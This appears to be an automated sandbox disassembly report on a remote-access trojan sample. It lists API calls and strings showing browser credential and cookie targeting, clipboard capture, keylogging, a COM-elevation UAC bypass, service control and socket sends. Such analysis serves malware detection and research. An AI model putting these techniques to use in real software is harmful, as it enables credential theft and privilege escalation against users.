                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$CloseFile$FirstNext
                                                                                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                • API String ID: 1164774033-3681987949
                                                                                                • Opcode ID: c986c19729caa3a313bc4f9ae7a81b86531806d2cfc740fef6be58901a69cfd2
                                                                                                • Instruction ID: 4260ee55bd24f38cfaff6d718e7bb7aae0563b8f0cd35122f003610daf392ab1
                                                                                                • Opcode Fuzzy Hash: c986c19729caa3a313bc4f9ae7a81b86531806d2cfc740fef6be58901a69cfd2
                                                                                                • Instruction Fuzzy Hash: 0A510B319042195ADB14F7A2DC96AEE7764EF50318F50017FF806B30E2EF789A45CA9D
                                                                                                APIs
                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$Close$File$FirstNext
                                                                                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                • API String ID: 3527384056-432212279
                                                                                                • Opcode ID: 8a6cad179014d05868a0b4d502b961af7ac8586398df74f2c3f4a5996077e968
                                                                                                • Instruction ID: 1e8de758c2b97f43aed4804fc6a56dd8ce4d3e4bc3adeefe5a602588f19c01c2
                                                                                                • Opcode Fuzzy Hash: 8a6cad179014d05868a0b4d502b961af7ac8586398df74f2c3f4a5996077e968
                                                                                                • Instruction Fuzzy Hash: F4412C319042196ACB14F7A5EC569EE7768EE11318F50017FF802B31E2EF399A458A9E
                                                                                                APIs
                                                                                                • OpenClipboard.USER32 ref: 00415B5F
                                                                                                • EmptyClipboard.USER32 ref: 00415B6D
                                                                                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00415B8D
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00415B96
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00415BCC
                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00415BD5
                                                                                                • CloseClipboard.USER32 ref: 00415BF2
                                                                                                • OpenClipboard.USER32 ref: 00415BF9
                                                                                                • GetClipboardData.USER32(0000000D), ref: 00415C09
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00415C12
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00415C1B
                                                                                                • CloseClipboard.USER32 ref: 00415C21
                                                                                                  • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                • String ID:
                                                                                                • API String ID: 3520204547-0
                                                                                                • Opcode ID: a8e6a3416fd1872a8246098fb3b89220c53028d7a91b986e58d7c604e3fe381e
                                                                                                • Instruction ID: a6dc46a1ac747b1df6f49b20b287b9a63e2ec98da8de7deae82efe0a0170cbcd
                                                                                                • Opcode Fuzzy Hash: a8e6a3416fd1872a8246098fb3b89220c53028d7a91b986e58d7c604e3fe381e
                                                                                                • Instruction Fuzzy Hash: A82137711047009BC714BBB1DC5AAAF7669AF94B06F00443FF907A61E2EF38C945C76A
                                                                                                APIs
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,004750FC), ref: 0040E30B
                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,004750FC), ref: 0040E336
                                                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E352
                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E3D5
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,004750FC), ref: 0040E3E4
                                                                                                  • Part of subcall function 004128AD: RegCreateKeyA.ADVAPI32(80000001,00000000,TeF), ref: 004128BB
                                                                                                  • Part of subcall function 004128AD: RegSetValueExA.KERNEL32(TeF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004670E0,00000001,000000AF,00466554), ref: 004128D6
                                                                                                  • Part of subcall function 004128AD: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004670E0,00000001,000000AF,00466554), ref: 004128E1
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,004750FC), ref: 0040E449
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                                                • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                                                                • API String ID: 726551946-1743721670
                                                                                                • Opcode ID: cd666abf2f326cbe46c2a3c259927547c09d30fbf62cf7966227fce1db742c49
                                                                                                • Instruction ID: 57de327b15d82dbd2eac346b6cac6cdabb084366653080b34320caf9a24139d1
                                                                                                • Opcode Fuzzy Hash: cd666abf2f326cbe46c2a3c259927547c09d30fbf62cf7966227fce1db742c49
                                                                                                • Instruction Fuzzy Hash: A17150311043419BC714FB62D8529AFB7A5AFD1358F400D3EF986631E2EF389919CA9A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0$1$2$3$4$5$6$7
                                                                                                • API String ID: 0-3177665633
                                                                                                • Opcode ID: 6d8d61d5fd1b3d06eb8c3e74dcd3fa59f6a6901e114636d14e9c7b12e1fc9d9f
                                                                                                • Instruction ID: a206eb20bee8e87b23b85030021c48398d73e585fead2f4b7fd4ae1d02439eb2
                                                                                                • Opcode Fuzzy Hash: 6d8d61d5fd1b3d06eb8c3e74dcd3fa59f6a6901e114636d14e9c7b12e1fc9d9f
                                                                                                • Instruction Fuzzy Hash: EA61D5B4108301AEDB00EF21C862FEA77E4AF95750F44485EF591672E2DF78AA48C797
                                                                                                APIs
                                                                                                • GetForegroundWindow.USER32(?,?,00475108), ref: 00409B3F
                                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                • GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                • GetKeyboardState.USER32(?,?,00475108), ref: 00409B67
                                                                                                • ToUnicodeEx.USER32(0047515C,00000000,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                • ToUnicodeEx.USER32(0047515C,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                • String ID: `kG
                                                                                                • API String ID: 1888522110-3643241581
                                                                                                • Opcode ID: c97b305c4e5192c039be4b57959f7d148ad44e176559ca20096398a0f42faa8b
                                                                                                • Instruction ID: 5852d3e9e60d78bbc7fecef5f6baa999b7b2ba0a9f64a262714a670a3ee03c46
                                                                                                • Opcode Fuzzy Hash: c97b305c4e5192c039be4b57959f7d148ad44e176559ca20096398a0f42faa8b
                                                                                                • Instruction Fuzzy Hash: 3B318F72504308AFD700DF91DC45FDBB7ECEB88715F01083AB645D61A1DBB5E9488B9A
                                                                                                APIs
                                                                                                • _wcslen.LIBCMT ref: 00406788
                                                                                                • CoGetObject.OLE32(?,00000024,004669B0,00000000), ref: 004067E9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Object_wcslen
                                                                                                • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                • API String ID: 240030777-3166923314
                                                                                                • Opcode ID: 37d5bffcbb8f4b2cbb961f9636bb3800fd08e5c8d40d037755d6192962cbe9cf
                                                                                                • Instruction ID: 6c9b37094527eb08cc4748ecdfbd23cbc672ad5faa28133fe458ce4522bc368c
                                                                                                • Opcode Fuzzy Hash: 37d5bffcbb8f4b2cbb961f9636bb3800fd08e5c8d40d037755d6192962cbe9cf
                                                                                                • Instruction Fuzzy Hash: B11133B29011186ADB10FAA58955A9E77BCDB48714F11047FF905F3281E77C9A0486BD
                                                                                                APIs
                                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00475920), ref: 00419ACE
                                                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419B1D
                                                                                                • GetLastError.KERNEL32 ref: 00419B2B
                                                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 00419B63
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                • String ID:
                                                                                                • API String ID: 3587775597-0
                                                                                                • Opcode ID: e581007d88b96ae26cb7fcb56ddfc551ae6b89a21020d81076c927b161d636cb
                                                                                                • Instruction ID: 410433f0f292194423399e5208e7b63ee2478b974df0930e3a7ace9da88798fe
                                                                                                • Opcode Fuzzy Hash: e581007d88b96ae26cb7fcb56ddfc551ae6b89a21020d81076c927b161d636cb
                                                                                                • Instruction Fuzzy Hash: C28142311043049BC314FB21DC95DAFB7A8BF94718F50492EF582621D2EF78EA09CB9A
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004752F0,00475308), ref: 0041B694
                                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004752F0,00475308), ref: 0041B6C6
                                                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004752F0,00475308), ref: 0041B734
                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004752F0,00475308), ref: 0041B741
                                                                                                  • Part of subcall function 0041B63A: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004752F0,00475308), ref: 0041B717
                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004752F0,00475308), ref: 0041B76C
                                                                                                • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004752F0,00475308), ref: 0041B773
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,004752F0,00475308), ref: 0041B77B
                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004752F0,00475308), ref: 0041B78E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                • String ID:
                                                                                                • API String ID: 2341273852-0
                                                                                                • Opcode ID: 29d361786a175de539fdf9d753c964fcdbe74632238a9f507c15aa3fc292f646
                                                                                                • Instruction ID: 009c1ade3c0c7cd9a9baeecb78710ce3116f293085b5e5d3e47bbce280e6f24a
                                                                                                • Opcode Fuzzy Hash: 29d361786a175de539fdf9d753c964fcdbe74632238a9f507c15aa3fc292f646
                                                                                                • Instruction Fuzzy Hash: 2931937180521CAACB20E7B19C89FDA777CAF55304F0404EBF515E2181EF799AC4CB69
                                                                                                APIs
                                                                                                • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 004130F2
                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 004130FE
                                                                                                  • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                                • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004132C5
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004132CC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                • API String ID: 2127411465-314212984
                                                                                                • Opcode ID: 35b77d36bc96d01cce32ea32965aae0de390119b6fa0ec7b42d67256e472defc
                                                                                                • Instruction ID: 0508f95716d3db9771c6b78d28bd3d55684df0f5bc265fe56362dad8d88080f3
                                                                                                • Opcode Fuzzy Hash: 35b77d36bc96d01cce32ea32965aae0de390119b6fa0ec7b42d67256e472defc
                                                                                                • Instruction Fuzzy Hash: CEB1A371A043006BC614FA76CC979BE76695F9471CF40063FF846B31E2EE7C9A48869B
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 004190B5
                                                                                                • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419181
                                                                                                  • Part of subcall function 0041B825: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B83E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$Find$CreateFirstNext
                                                                                                • String ID: PSG$NG$VG$VG
                                                                                                • API String ID: 341183262-216422830
                                                                                                • Opcode ID: 32e2d046b69af8d5a085c9a7c48b03ccade2f2f4b430494c7d2c074f242a6926
                                                                                                • Instruction ID: 0b04574543ffaf1c42473f802d0f517b04b5d48d9dde9d4f65c428d20583ff9f
                                                                                                • Opcode Fuzzy Hash: 32e2d046b69af8d5a085c9a7c48b03ccade2f2f4b430494c7d2c074f242a6926
                                                                                                • Instruction Fuzzy Hash: AF8150315042405AC314FB71C8A6EEF73A8AFD0718F50493FF946671E2EF389A49C69A
                                                                                                APIs
                                                                                                  • Part of subcall function 004470CF: GetLastError.KERNEL32(?,?,0043952C,?,00000000,?,0043BB65,00000000,00000000), ref: 004470D3
                                                                                                  • Part of subcall function 004470CF: _free.LIBCMT ref: 00447106
                                                                                                  • Part of subcall function 004470CF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00447147
                                                                                                  • Part of subcall function 004470CF: _abort.LIBCMT ref: 0044714D
                                                                                                  • Part of subcall function 004470CF: _free.LIBCMT ref: 0044712E
                                                                                                  • Part of subcall function 004470CF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 0044713B
                                                                                                • GetUserDefaultLCID.KERNEL32 ref: 004516D3
                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 0045172E
                                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 0045173D
                                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451785
                                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 004517A4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                • String ID: (E
                                                                                                • API String ID: 745075371-542121585
                                                                                                • Opcode ID: a84efe1a2cce186fb5bbf2749623e7c2965abdb2206941bc4280497163ca2dcb
                                                                                                • Instruction ID: 0c55cced660072bbdea70b00f38c40adf5ab32faa3293abc4b1f14fb3cf6f882
                                                                                                • Opcode Fuzzy Hash: a84efe1a2cce186fb5bbf2749623e7c2965abdb2206941bc4280497163ca2dcb
                                                                                                • Instruction Fuzzy Hash: EB5193719002059BDB10EFA5CC41BBF77B8AF04706F18056BFD11EB262DB789949CB69
                                                                                                APIs
                                                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                                                                • GetLastError.KERNEL32 ref: 0040B261
                                                                                                Strings
                                                                                                • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                                                                • UserProfile, xrefs: 0040B227
                                                                                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                                                                • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DeleteErrorFileLast
                                                                                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                • API String ID: 2018770650-1062637481
                                                                                                • Opcode ID: d17b2333bc2163b6167728b5ded5d3e090d419ce871230e0759fe87cebad6f17
                                                                                                • Instruction ID: af3d5975f8ef5736f4e1f689bc2271043fd855ebe8bb8600121af3fad6928989
                                                                                                • Opcode Fuzzy Hash: d17b2333bc2163b6167728b5ded5d3e090d419ce871230e0759fe87cebad6f17
                                                                                                • Instruction Fuzzy Hash: 5C01D63168010597CA0476B6DC6F8AF3B24E921708B10017FF802731E2FF3A9905C6DE
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416CAA
                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00416CB1
                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416CC3
                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416CE2
                                                                                                • GetLastError.KERNEL32 ref: 00416CE8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                • String ID: SeShutdownPrivilege
                                                                                                • API String ID: 3534403312-3733053543
                                                                                                • Opcode ID: 594fceb9dcf720018193b7af68db4771e8a957862718425d2e1bf0ede3cec24e
                                                                                                • Instruction ID: cb90277d3e2bb8506008076be0b211c0c8a285b816e0fe18bd298ac82c07c5c8
                                                                                                • Opcode Fuzzy Hash: 594fceb9dcf720018193b7af68db4771e8a957862718425d2e1bf0ede3cec24e
                                                                                                • Instruction Fuzzy Hash: EEF0DA75901229BBDB109B91DC4DEEF7EBCEF05656F110065B805B20A2DE748A08CAA5
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __floor_pentium4
                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                • API String ID: 4168288129-2761157908
                                                                                                • Opcode ID: 1bf5a653629e57a1f7b5c3ded9cb374cb4a646758b38e4d76f229b2a49b28d64
                                                                                                • Instruction ID: c7cd0fe6fb368e325f13a714a82e3d7b4865f9b831a19f2b9b664dd372279c0a
                                                                                                • Opcode Fuzzy Hash: 1bf5a653629e57a1f7b5c3ded9cb374cb4a646758b38e4d76f229b2a49b28d64
                                                                                                • Instruction Fuzzy Hash: 58C27171D046288FDB25CE28DD407EAB3B5EB84346F1541EBD84DE7242E778AE898F44
                                                                                                APIs
                                                                                                • __EH_prolog.LIBCMT ref: 004089AE
                                                                                                  • Part of subcall function 004041F1: socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                                  • Part of subcall function 0040428C: connect.WS2_32(?,01339ED0,00000010), ref: 004042A5
                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                                                  • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(000002B8,00000000,{NAL,?,?,00000004,?,?,00000004,00474EE0,004755B0,00000000), ref: 0040450E
                                                                                                  • Part of subcall function 00404468: SetEvent.KERNEL32(000002B8,?,?,00000004,?,?,00000004,00474EE0,004755B0,00000000,?,?,?,?,?,00414E7B), ref: 0040453C
                                                                                                  • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                  • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                  • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                                                  • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                                                • String ID:
                                                                                                • API String ID: 4043647387-0
                                                                                                • Opcode ID: 6d67a54169e7dad17f9b44cb4f1ec8b083b3089b0f086354762d7994e5b419fe
                                                                                                • Instruction ID: d6647de2ed81915fd1100427b9b1f0ab8477674b12134c2b00fdd843198b9521
                                                                                                • Opcode Fuzzy Hash: 6d67a54169e7dad17f9b44cb4f1ec8b083b3089b0f086354762d7994e5b419fe
                                                                                                • Instruction Fuzzy Hash: 0DA16E719001089BCB14EBA1DD92AEDB779AF54318F10427FF506B71D2EF385E498B98
                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,00419A10,00000000,00000000), ref: 00419DC3
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,00419A10,00000000,00000000), ref: 00419DD8
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,00419A10,00000000,00000000), ref: 00419DE5
                                                                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,00419A10,00000000,00000000), ref: 00419DF0
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,00419A10,00000000,00000000), ref: 00419E02
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,00419A10,00000000,00000000), ref: 00419E05
                                                                                                Memory Dump Source
